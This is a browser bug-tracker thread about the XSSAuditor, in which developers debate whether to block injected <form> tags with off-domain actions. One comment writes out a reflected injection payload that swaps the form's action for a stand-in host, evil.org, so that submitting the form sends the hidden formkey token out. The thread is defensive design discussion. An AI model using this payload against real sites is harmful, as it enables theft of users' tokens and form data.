Bug 72585

Yeah, we should only need to block JavaScript URLs.

(This is a false positive, so not a security bug.)

Though it is a false positive according to the design, it is in-fact protecting against <form> injection which is good. It is the same with <iframe> injection where the src attribute is removed even if the src is not a JavaScript URL . 

One more corner case is that <iframe> from a same domain can be injected successfully. I assume this as a design decision . 

p.s I couldn't find an example in which detecting an injected form is a false positive

Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam sugests in Comment #1).   Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when page contains:

<form action="http://good.com">
  <input type="text" name="quantity" value="2">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">
</form>

and the "quantity" input element contains an injection, and we reflect from the URL say

   ...?quantity="></form><form action="http://evil.org">

resulting in page:

<form action="http://good.com">
  <input type="text" name="quantity" value=""></form><form action="http://evil.org">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">
</form>

So when the user hits submit, we steal his formkey token (or other information from input fields).

Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute.

Thanks heaps.